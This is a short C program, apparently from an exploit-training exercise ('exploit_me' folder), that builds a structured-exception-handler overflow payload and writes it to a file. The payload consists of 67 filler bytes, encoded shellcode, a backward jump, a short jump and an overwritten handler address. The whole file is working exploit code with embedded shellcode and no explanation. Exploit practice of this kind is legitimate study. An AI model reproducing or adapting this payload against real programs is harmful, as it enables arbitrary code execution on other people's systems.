int main()
{
HANDLE hFile;
PVOID buffer;
DWORD BytesWritten;
DWORD shortjmp = 0x9090f9eb;
DWORD handler = 0x00280b0b;
char shellcode[] = "\xd9\xcb\x31\xc9\xbf\x46\xb7\x8b\x7c\xd9\x74\x24\xf4\xb1"
"\x1e\x5b\x31\x7b\x18\x03\x7b\x18\x83\xc3\x42\x55\x7e\x80"
"\xa2\xdd\x81\x79\x32\x55\xc4\x45\xb9\x15\xc2\xcd\xbc\x0a"
"\x47\x62\xa6\x5f\x07\x5d\xd7\xb4\xf1\x16\xe3\xc1\x03\xc7"
"\x3a\x16\x9a\xbb\xb8\x56\xe9\xc4\x01\x9c\x1f\xca\x43\xca"
"\xd4\xf7\x17\x29\x11\x7d\x72\xba\x46\x59\x7d\x56\x1e\x2a"
"\x71\xe3\x54\x73\x95\xf2\x81\x07\xb9\x7f\x54\xf3\x48\x23"
"\x73\x07\x89\x83\x4a\xf1\x6d\x6a\xc9\x76\x2b\xa2\x9a\xc9"
"\xbf\x49\xec\xd5\x12\xc6\x65\xee\xe5\x21\xf6\x2e\x9f\x81"
"\x91\x5e\xd5\x26\x3d\xf7\x71\xd8\x4b\x09\xd6\xda\xab\x75"
"\xb9\x48\x57\x7a";
char longjmp[] = "\xe9\x6b\xff\xff\xff";
buffer = malloc(224);
hFile = CreateFile("F:\\desktop\\exploit_me\\exploit_me\\4\\1.txt",GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
memset(buffer,0x41,67);
memcpy((char *)buffer + 67,shellcode,144);
memcpy((char *)buffer + 211,longjmp,5);
memcpy((char *)buffer + 216,&shortjmp,4);
memcpy((char *)buffer + 220,&handler,4);
WriteFile(hFile,buffer,224,&BytesWritten,NULL);
CloseHandle(hFile);
return 0;
}
